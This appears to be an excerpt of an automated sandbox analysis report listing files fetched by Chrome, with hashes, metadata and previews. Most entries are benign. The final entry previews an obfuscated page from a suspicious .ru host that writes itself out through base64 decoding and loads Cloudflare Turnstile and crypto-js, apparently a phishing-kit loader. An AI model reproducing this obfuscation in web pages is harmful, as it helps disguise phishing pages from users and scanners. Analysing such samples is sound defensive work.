                                                    SHA-512:B98D51C908804C644093597C79E6306F6044184225F654C61884DE0199BCFD841533EA63C745D30361C86A82E8AC33A3BFF584362F40A66D22E8912F307884DF
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISywIJ7mgEa2We7XoSBQ0OSxGBEgUN6eNTdBIFDR3cwiISBQ2C9fguEgUNkWGVThIFDe301u4SBQ2RYZVOEgUN2KsWJRIFDZFhlU4SBQ1hzte8EgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ1ATKydEgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNrzE0ixIFDWKNrIASBQ2DZL2uEgUNkWGVThIFDRvocN0SBQ0de0PCEgUNtTMi5xIFDRVE7asSBQ3blMuDEgUNkWGVThIFDa-cRAgSBQ26oHB5EgUNVKBLehIFDd7KYcsSBQ2RYZVOEgUNNKdJRBIFDeV_-K4SBQ3SozKUEgUNEh3fQRIFDTGuzWISBQ2Rp4C7EgUNzddNKhIFDQsJcRESBQ2NcmJuEgUNkWGVThIFDYosYIESBQ2RYZVO?alt=proto
                                                    Preview:Cp4DCgcNDksRgRoACgcN6eNTdBoACgcNHdzCIhoACgcNgvX4LhoACgcNkWGVThoACgcN7fTW7hoACgcNkWGVThoACgcN2KsWJRoACgcNkWGVThoACgcNYc7XvBoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNQEysnRoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNrzE0ixoACgcNYo2sgBoACgcNg2S9rhoACgcNkWGVThoACgcNG+hw3RoACgcNHXtDwhoACgcNtTMi5xoACgcNFUTtqxoACgcN25TLgxoACgcNkWGVThoACgcNr5xECBoACgcNuqBweRoACgcNVKBLehoACgcN3sphyxoACgcNkWGVThoACgcNNKdJRBoACgcN5X/4rhoACgcN0qMylBoACgcNEh3fQRoACgcNMa7NYhoACgcNkaeAuxoACgcNzddNKhoACgcNCwlxERoACgcNjXJibhoACgcNkWGVThoACgcNiixggRoACgcNkWGVThoA
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (40966), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):40966
                                                    Entropy (8bit):5.326310213208323
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:EF64CEB6065542FD708829E79233AA92
                                                    SHA1:F682E56BA2FD1424A60B55993DB5BCE36735D0D6
                                                    SHA-256:A5B46D48E82E5B4CCFB65FBFE533AC0FC44243A0A9E7648E7D5633C56CCAAA90
                                                    SHA-512:239BFB2ED014E006EA053B8552D6CEDE950E49EC65FA3421ABB52DC4C6EF48E1A8ACD95B145B6DAB025A65FA4EBAC89E45F70127AF6E6D15DC6FABD227418A1F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/writer3/js/writer_rightpanel_min_all.ef64ceb6065542fd708829e79233aa92.js
                                                    Preview:var RightPanel=function(){"use strict";var e={RIGHT_PANEL_CONTAINER:"rpanel-container",TAB_CONTAINER:"tab-container",EXTENSION_PANEL:"extension-panel",EXTENSION_BODY_CONTAINER:"extension-widget-body-cont",EXTENSION_POST_TO_BLOG_CONTAINER:"extension-posttoblog-body-cont",WORDPRESSPANEL:"wordpress-subpanel",BLOGGERPANEL:"blogger-subpanel",INTEGRATED_APPS_CONTAINER:"integrated-extension-cont",EXTENSION_CONTAINER:"extension-cont"},t={},n=[],a=function(e){var t=o(e);return t>=0?{index:t,panelObj:n[t]}:null},o=function(e){for(var t=0,a=i();t<a;t++)if(n[t].panelId==e)return t;return-1},i=function(){return n.length},s=function(){var e=n.length;return e>0?n[e-1]:null},r=function(){for(var e=i(),t=0;t<e;t++){var n=s();N(n.panelId)}},l=function(e){return t[e]},d=function(e,n){t[e]=n},c=function(e){var t=Z(e).find(".js-panel-close-btn");t.show(),t.bind("click",RightPanel.closeSubPanel)},p=function(e){Z(e).find(".js-panel-close-btn").unbind("click",RightPanel.closeSubPanel)},u={FADEOUT:function(e){
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (640), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):640
                                                    Entropy (8bit):4.697821822306064
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:3336F8C5FA466B05BE03BCED08A6F09C
                                                    SHA1:1D93AE1091F67FD23EDADD8296662EBBD40F63A4
                                                    SHA-256:0FD4C32B9C47788E288762FD3B6579673691837240A46700A30E4B3B1A644D6A
                                                    SHA-512:AEE6335F580103DEB1210759D1F7BEA9B6FDEC84979A22837DC53EB81DB66899A591BE3B83FD5CB2E0C5AA0BBEB5AFB7AEB4C5F76387CA77D845BAF54530106D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzIS_AIJErbi37w0TRcSBQ0OSxGBEgUN6eNTdBIFDR3cwiISBQ2C9fguEgUNkWGVThIFDe301u4SBQ2RYZVOEgUN2KsWJRIFDZFhlU4SBQ1hzte8EgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ1ATKydEgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNrzE0ixIFDWKNrIASBQ2DZL2uEgUNkWGVThIFDRvocN0SBQ2RYZVOEgUNHXtDwhIFDZFhlU4SBQ21MyLnEgUNkWGVThIFDRVE7asSBQ3blMuDEgUNkWGVThIFDZFhlU4SBQ2vnEQIEgUNuqBweRIFDVSgS3oSBQ3eymHLEgUNkWGVThIFDTSnSUQSBQ3lf_iuEgUN0qMylBIFDRId30ESBQ0xrs1iEgUNkaeAuxIFDc3XTSoSBQ0LCXEREgUN06X0ChIFDYZyDWkSBQ2NcmJuEgUNkWGVThIFDYosYIESBQ2RYZVOEgUNBu27_w==?alt=proto
                                                    Preview:Ct0DCgcNDksRgRoACgcN6eNTdBoACgcNHdzCIhoACgcNgvX4LhoACgcNkWGVThoACgcN7fTW7hoACgcNkWGVThoACgcN2KsWJRoACgcNkWGVThoACgcNYc7XvBoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNQEysnRoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNrzE0ixoACgcNYo2sgBoACgcNg2S9rhoACgcNkWGVThoACgcNG+hw3RoACgcNkWGVThoACgcNHXtDwhoACgcNkWGVThoACgcNtTMi5xoACgcNkWGVThoACgcNFUTtqxoACgcN25TLgxoACgcNkWGVThoACgcNkWGVThoACgcNr5xECBoACgcNuqBweRoACgcNVKBLehoACgcN3sphyxoACgcNkWGVThoACgcNNKdJRBoACgcN5X/4rhoACgcN0qMylBoACgcNEh3fQRoACgcNMa7NYhoACgcNkaeAuxoACgcNzddNKhoACgcNCwlxERoACgcN06X0ChoACgcNhnINaRoACgcNjXJibhoACgcNkWGVThoACgcNiixggRoACgcNkWGVThoACgcNBu27/xoA
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                    Category:dropped
                                                    Size (bytes):116343
                                                    Entropy (8bit):7.997640489040715
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:3063B0DA40B45B46602FCE99AC53D315
                                                    SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                    SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                    SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (7549), with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):20055
                                                    Entropy (8bit):5.885060855604005
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:3AA72194053D05AF5EB8AB60AD387B33
                                                    SHA1:F364F04AEB802E475107066CD2916B5BFB66A789
                                                    SHA-256:E783676D4BAC6B4770B6FD28422382CF536401DC4F3D40BD01076322ACF1CD86
                                                    SHA-512:957995288E0387688D38E65E7AA6A017D9580E174A2A905C9DE1355994C7ACED399629AFC5A20129F06EB42B3D95A21A287259D3A1B4D7867A519598338236E2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://yolito.xomivarne.ru/uBWuCBti/
                                                    Preview: The successful warrior is the average man, with laser-like focus. -->.. Opportunities don&#039;t happen, you create them. -->..<script>....if(atob("aHR0cHM6Ly95b2xpdG8ueG9taXZhcm5lLnJ1L3VCV3VDQnRpLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogI
                                                    No static file info